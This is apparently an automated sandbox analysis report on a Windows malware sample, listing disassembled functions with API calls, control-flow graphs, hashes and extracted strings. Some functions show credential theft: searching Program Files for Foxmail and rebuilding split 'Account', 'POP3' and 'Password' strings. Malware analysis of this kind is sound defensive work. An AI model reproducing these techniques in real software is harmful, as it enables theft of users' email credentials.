TlsSetValue 6888->6889 6890 24575e94 6888->6890 6889->6890 6891 24572ada _ValidateLocalCookies 5 API calls 6890->6891 6892 24575bc8 6891->6892 6892->6854 6892->6859 6904 24575914 6893->6904 6901 24575c71 6898->6901 6903 24575c75 __crt_fast_encode_pointer 6898->6903 6899 24575c95 6902 24575ca1 GetProcAddress 6899->6902 6899->6903 6900 24575ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6900->6901 6901->6899 6901->6900 6901->6903 6902->6903 6903->6868 6905 24575854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6904->6905 6906 24575938 6905->6906 6907 245758c4 6906->6907 6908 24575758 __dosmaperr 20 API calls 6907->6908 6909 245758e8 6908->6909 6909->6864 6911 24571ca6 _strlen 6910->6911 6911->6806

                      Executed Functions

                      Function 245710F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24571137
                      • lstrcatW.KERNEL32(?,?), ref: 24571151
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457115C
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457116D
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457117C
                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24571193
                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 245711D0
                      • FindClose.KERNELBASE(00000000), ref: 245711DB
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                      • String ID:
                      • API String ID: 1083526818-0
                      • Opcode ID: cb0bdcbb3daff22d130ba59ad90c7afd11398beb7f3f76dc5d395ea07abd678f
                      • Instruction ID: 963c07fa4abd70e3bb5bd7f322b8b5ba1e88a337876a686410901505f0ae0789
                      • Opcode Fuzzy Hash: cb0bdcbb3daff22d130ba59ad90c7afd11398beb7f3f76dc5d395ea07abd678f
                      • Instruction Fuzzy Hash: CD2171725043486BD721EA64AC48F9B7BACFF84354F00093AFA98D71D0FB74D6098796
                      Function 245712EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 24571434
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24571137
                        • Part of subcall function 245710F1: lstrcatW.KERNEL32(?,?), ref: 24571151
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457115C
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457116D
                        • Part of subcall function 245710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2457117C
                        • Part of subcall function 245710F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24571193
                        • Part of subcall function 245710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 245711D0
                        • Part of subcall function 245710F1: FindClose.KERNELBASE(00000000), ref: 245711DB
                      • lstrlenW.KERNEL32(?), ref: 245714C5
                      • lstrlenW.KERNEL32(?), ref: 245714E0
                      • lstrlenW.KERNEL32(?,?), ref: 2457150F
                      • lstrcatW.KERNEL32(00000000), ref: 24571521
                      • lstrlenW.KERNEL32(?,?), ref: 24571547
                      • lstrcatW.KERNEL32(00000000), ref: 24571553
                      • lstrlenW.KERNEL32(?,?), ref: 24571579
                      • lstrcatW.KERNEL32(00000000), ref: 24571585
                      • lstrlenW.KERNEL32(?,?), ref: 245715AB
                      • lstrcatW.KERNEL32(00000000), ref: 245715B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                      • String ID: )$Foxmail$ProgramFiles
                      • API String ID: 672098462-2938083778
                      • Opcode ID: 615908975c1e80270c94215bc1f31bd031e4cfc69bd95f8f6de058cd782a03b5
                      • Instruction ID: ca4a0cd2e78a5a79ceed35fc5a10bedcedc8310d9bebe0922f68534878f5ef42
                      • Opcode Fuzzy Hash: 615908975c1e80270c94215bc1f31bd031e4cfc69bd95f8f6de058cd782a03b5
                      • Instruction Fuzzy Hash: FC81B371A40368AAEB20DBA1DC85FDF777DEF84700F0015A6F508EB194EA715A84CF95
                      Function 2457C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetModuleHandleA.KERNEL32(2457C7DD), ref: 2457C7E6
                      • GetModuleHandleA.KERNEL32(?,2457C7DD), ref: 2457C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 2457C860
                        • Part of subcall function 2457C803: GetProcAddress.KERNEL32(00000000,2457C7F4), ref: 2457C804
                        • Part of subcall function 2457C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C816
                        • Part of subcall function 2457C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C82A
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProtectVirtual
                      • String ID:
                      • API String ID: 2099061454-0
                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction ID: f591e041f11fe15d6ccb98a9d1473d3155f08841d2acaea07042f2acf4f42abb
                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction Fuzzy Hash: 27012801A452413CBB1356B42C05EBA5FF8DB67660B101BB6E2C0DB193DAACC606F3F6
                      Function 2457C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 80 2457c7a7-2457c7bc 81 2457c7be-2457c7c6 80->81 82 2457c82d 80->82 81->82 83 2457c7c8-2457c7f6 call 2457c7e6 81->83 84 2457c82f-2457c833 82->84 91 2457c86c 83->91 92 2457c7f8 83->92 86 2457c835-2457c83d GetModuleHandleA 84->86 87 2457c872 call 2457c877 84->87 90 2457c83f-2457c847 86->90 90->90 93 2457c849-2457c84c 90->93 97 2457c86d-2457c86e 91->97 94 2457c85b-2457c85e 92->94 95 2457c7fa-2457c7fc 92->95 93->84 96 2457c84e-2457c850 93->96 100 2457c85f-2457c860 GetProcAddress 94->100 95->97 101 2457c7fe 95->101 102 2457c856-2457c85a 96->102 103 2457c852-2457c854 96->103 98 2457c866-2457c86b 97->98 99 2457c870 97->99 98->91 99->93 104 2457c865 100->104 101->104 105 2457c800-2457c80b GetProcAddress 101->105 102->94 103->100 104->98 105->82 106 2457c80d-2457c81a VirtualProtect 105->106 107 2457c82c 106->107 108 2457c81c-2457c82a VirtualProtect 106->108 107->82 108->107
                      APIs
                      • GetModuleHandleA.KERNEL32(?,2457C7DD), ref: 2457C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 2457C860
                        • Part of subcall function 2457C7E6: GetModuleHandleA.KERNEL32(2457C7DD), ref: 2457C7E6
                        • Part of subcall function 2457C7E6: GetProcAddress.KERNEL32(00000000,2457C7F4), ref: 2457C804
                        • Part of subcall function 2457C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C816
                        • Part of subcall function 2457C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C82A
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProtectVirtual
                      • String ID:
                      • API String ID: 2099061454-0
                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction ID: eb949d8d098d7eadea257420c38f4ba49ad6772c817f9cad686235f02c98058f
                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction Fuzzy Hash: 032136224082816FF7138BB46C04BA67FF8DB53260F180AB6D1C0DB143D6ACC546E3A2
                      Function 2457C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 109 2457c803-2457c80b GetProcAddress 110 2457c82d 109->110 111 2457c80d-2457c81a VirtualProtect 109->111 114 2457c82f-2457c833 110->114 112 2457c82c 111->112 113 2457c81c-2457c82a VirtualProtect 111->113 112->110 113->112 115 2457c835-2457c83d GetModuleHandleA 114->115 116 2457c872 call 2457c877 114->116 118 2457c83f-2457c847 115->118 118->118 119 2457c849-2457c84c 118->119 119->114 120 2457c84e-2457c850 119->120 121 2457c856-2457c85e 120->121 122 2457c852-2457c854 120->122 124 2457c85f-2457c865 GetProcAddress 121->124 122->124 126 2457c866-2457c86e 124->126 129 2457c870 126->129 129->119
                      APIs
                      • GetProcAddress.KERNEL32(00000000,2457C7F4), ref: 2457C804
                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C816
                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2457C7F4,2457C7DD), ref: 2457C82A
                      • GetModuleHandleA.KERNEL32(?,2457C7DD), ref: 2457C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 2457C860
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressProcProtectVirtual$HandleModule
                      • String ID:
                      • API String ID: 2152742572-0
                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction ID: 1551dc1474e02882f6c17b225503da2b59e9ac0f377af2299f4b7a87d1e4beff
                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction Fuzzy Hash: DBF0F0416893403CFB1346B42C45EBA5FFC8B67660B101AB6E2C0CB183D9ADC606B3F6

                      Non-executed Functions

                      Function 24573856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,24573518,245723F1,24571F17), ref: 24573864
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 24573872
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2457388B
                      • SetLastError.KERNEL32(00000000,?,24573518,245723F1,24571F17), ref: 245738DD
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: fb5fc453d8757b86944298231670663b9b1991edfbb43c61055141a3533d490f
                      • Instruction ID: e6637cfa15b841eb331918f8fedcb7bf2264b6df7940cafabcd2a85497ffd298
                      • Opcode Fuzzy Hash: fb5fc453d8757b86944298231670663b9b1991edfbb43c61055141a3533d490f
                      • Instruction Fuzzy Hash: 3201F73269A7259EF7021A797C889062BB4EB99675730023AF1D4B90D1FFEA9841F340
                      Function 245760E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 245761DA
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 245761E4
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 245761F1
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: 377f1020e4271210b5b5beb1dcccac4f6329d4c9137a4585013d925cfb472aaf
                      • Instruction ID: 740da0a3a6478ec6c2e96384c38868aec9433adf6a0ab647a58b7a0157cf612b
                      • Opcode Fuzzy Hash: 377f1020e4271210b5b5beb1dcccac4f6329d4c9137a4585013d925cfb472aaf
                      • Instruction Fuzzy Hash: 4631057490122CABCB21DF25D988B8DBBB8FF18310F1041EAE85CAB250E7349B858F44
                      Function 24574AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000,00000001,24572082,24582108,?,24571F3A,?), ref: 24574AD5
                      • TerminateProcess.KERNEL32(00000000,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000,00000001,24572082,24582108,?,24571F3A,?), ref: 24574ADC
                      • ExitProcess.KERNEL32 ref: 24574AEE
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: aa9f58f699355b4cce2619a89151a42c1c460665a78b50e22ae94ce02692fd8b
                      • Instruction ID: 4e2872a7a0788076a04b9d24b4b4ee392b90c981611767c7a7c2158fbc923f56
                      • Opcode Fuzzy Hash: aa9f58f699355b4cce2619a89151a42c1c460665a78b50e22ae94ce02692fd8b
                      • Instruction Fuzzy Hash: 6AE0BF35400214AFDF016F65DD09A493F7AFF41751B508034F98557161EB39DD46DA54
                      Function 24576580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: .
                      • API String ID: 0-248832578
                      • Opcode ID: 68b687a086bf009adb358b9f230a3f5580965e046f24f6cd0dbffe9437479505
                      • Instruction ID: fd08e89979c2ab591cdcae1c3c3a34b44a51593b1064cbac4ae5789094d15139
                      • Opcode Fuzzy Hash: 68b687a086bf009adb358b9f230a3f5580965e046f24f6cd0dbffe9437479505
                      • Instruction Fuzzy Hash: E1314471900209AFDB148F38DC84EEA7BFDDB85724F4001BCE998D7295E6309A45EB60
                      Function 2457724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: f8d2755420ffda994b263f946c65e30451746115f7b093b01a93b853417e4c9f
                      • Instruction ID: 2b523426daf8dda6a6bbd745457b5402f40dbbd55043458602bfe4732545f90a
                      • Opcode Fuzzy Hash: f8d2755420ffda994b263f946c65e30451746115f7b093b01a93b853417e4c9f
                      • Instruction Fuzzy Hash: C2A011B02002028F83008E30820A20C3AACFA002803002028F888E0080FB2C80808A00
                      Function 2457173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 139 2457173a-245717fe call 2457c030 call 24572c40 * 2 146 24571803 call 24571cca 139->146 147 24571808-2457180c 146->147 148 24571812-24571816 147->148 149 245719ad-245719b1 147->149 148->149 150 2457181c-24571837 call 24571ede 148->150 153 2457199f-245719ac call 24571ee7 * 2 150->153 154 2457183d-24571845 150->154 153->149 155 24571982-24571985 154->155 156 2457184b-2457184e 154->156 158 24571987 155->158 159 24571995-24571999 155->159 156->155 160 24571854-24571881 call 245744b0 * 2 call 24571db7 156->160 162 2457198a-2457198d call 24572c40 158->162 159->153 159->154 173 24571887-2457189f call 245744b0 call 24571db7 160->173 174 2457193d-24571943 160->174 168 24571992 162->168 168->159 173->174 187 245718a5-245718a8 173->187 175 24571945-24571947 174->175 176 2457197e-24571980 174->176 175->176 178 24571949-2457194b 175->178 176->162 180 24571961-2457197c call 245716aa 178->180 181 2457194d-2457194f 178->181 180->168 184 24571955-24571957 181->184 185 24571951-24571953 181->185 188 2457195d-2457195f 184->188 189 24571959-2457195b 184->189 185->180 185->184 191 245718c4-245718dc call 245744b0 call 24571db7 187->191 192 245718aa-245718c2 call 245744b0 call 24571db7 187->192 188->176 188->180 189->180 189->188 191->159 201 245718e2-2457193b call 245716aa call 245715da call 24572c40 * 2 191->201 192->191 192->201 201->159
                      APIs
                        • Part of subcall function 24571CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D1B
                        • Part of subcall function 24571CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24571D37
                        • Part of subcall function 24571CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D4B
                      • _strlen.LIBCMT ref: 24571855
                      • _strlen.LIBCMT ref: 24571869
                      • _strlen.LIBCMT ref: 2457188B
                      • _strlen.LIBCMT ref: 245718AE
                      • _strlen.LIBCMT ref: 245718C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _strlen$File$CopyCreateDelete
                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                      • API String ID: 3296212668-3023110444
                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction ID: 5d1f01497917f16749cb02bcea5b27da6b889520c685871383f98273a326cf90
                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction Fuzzy Hash: 3E610571D00218AFFF12CBA4D840BDEBBB9AF95204F0044B6D284AB35DDB749A46EF55
                      Function 245719B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %m$~$Gon~$~F@7$~dra
                      • API String ID: 4218353326-230879103
                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction ID: f6121e37d7088cc1cd5a2c33707acc6fc83d23d3b99d1c19279922108ca5cf6d
                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction Fuzzy Hash: 35711A71D00228ABEF129BB49884ADF7FFC9F55204F1440B6E684D7245E674D785EBA0
                      Function 24577CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 279 24577cc2-24577cd6 280 24577d44-24577d4c 279->280 281 24577cd8-24577cdd 279->281 283 24577d93-24577dab call 24577e35 280->283 284 24577d4e-24577d51 280->284 281->280 282 24577cdf-24577ce4 281->282 282->280 285 24577ce6-24577ce9 282->285 293 24577dae-24577db5 283->293 284->283 287 24577d53-24577d90 call 2457571e * 4 284->287 285->280 288 24577ceb-24577cf3 285->288 287->283 291 24577cf5-24577cf8 288->291 292 24577d0d-24577d15 288->292 291->292 295 24577cfa-24577d0c call 2457571e call 245790ba 291->295 298 24577d17-24577d1a 292->298 299 24577d2f-24577d43 call 2457571e * 2 292->299 296 24577db7-24577dbb 293->296 297 24577dd4-24577dd8 293->297 295->292 305 24577dd1 296->305 306 24577dbd-24577dc0 296->306 301 24577df0-24577dfc 297->301 302 24577dda-24577ddf 297->302 298->299 307 24577d1c-24577d2e call 2457571e call 245791b8 298->307 299->280 301->293 314 24577dfe-24577e0b call 2457571e 301->314 311 24577de1-24577de4 302->311 312 24577ded 302->312 305->297 306->305 316 24577dc2-24577dd0 call 2457571e * 2 306->316 307->299 311->312 319 24577de6-24577dec call 2457571e 311->319 312->301 316->305 319->312
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 24577D06
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245790D7
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245790E9
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245790FB
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457910D
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457911F
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579131
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579143
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579155
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579167
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 24579179
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457918B
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 2457919D
                        • Part of subcall function 245790BA: _free.LIBCMT ref: 245791AF
                      • _free.LIBCMT ref: 24577CFB
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 24577D1D
                      • _free.LIBCMT ref: 24577D32
                      • _free.LIBCMT ref: 24577D3D
                      • _free.LIBCMT ref: 24577D5F
                      • _free.LIBCMT ref: 24577D72
                      • _free.LIBCMT ref: 24577D80
                      • _free.LIBCMT ref: 24577D8B
                      • _free.LIBCMT ref: 24577DC3
                      • _free.LIBCMT ref: 24577DCA
                      • _free.LIBCMT ref: 24577DE7
                      • _free.LIBCMT ref: 24577DFF
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 6176e0447be42fb4b46e40255d2384a1fa862cdcfc627a61cebe7f58ba8b0a0a
                      • Instruction ID: 4af40e3a078ce7f72c07b305ea8a2b6132d92b8b4e95434346484394407d3cee
                      • Opcode Fuzzy Hash: 6176e0447be42fb4b46e40255d2384a1fa862cdcfc627a61cebe7f58ba8b0a0a
                      • Instruction Fuzzy Hash: 36316D31610A08EFEB219B38F844B667BF9EF80250F10847AE8C9DB555DE71F990EB14
                      Function 245759D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • _free.LIBCMT ref: 245759EA
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 245759F6
                      • _free.LIBCMT ref: 24575A01
                      • _free.LIBCMT ref: 24575A0C
                      • _free.LIBCMT ref: 24575A17
                      • _free.LIBCMT ref: 24575A22
                      • _free.LIBCMT ref: 24575A2D
                      • _free.LIBCMT ref: 24575A38
                      • _free.LIBCMT ref: 24575A43
                      • _free.LIBCMT ref: 24575A51
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: d1632eb208fbd1e9c1d06d3daea55ec48346596a66fc158c3f1e0ba9f044f610
                      • Instruction ID: 00dbac988030aaf3558a31168aa80602556c32d9788c728d9f38df85a663cbff
                      • Opcode Fuzzy Hash: d1632eb208fbd1e9c1d06d3daea55ec48346596a66fc158c3f1e0ba9f044f610
                      • Instruction Fuzzy Hash: 1211A47A52014CEFDB11DF54C841CDD3FB5EF94290B1540B9BA498BA29DA31DA50EB84
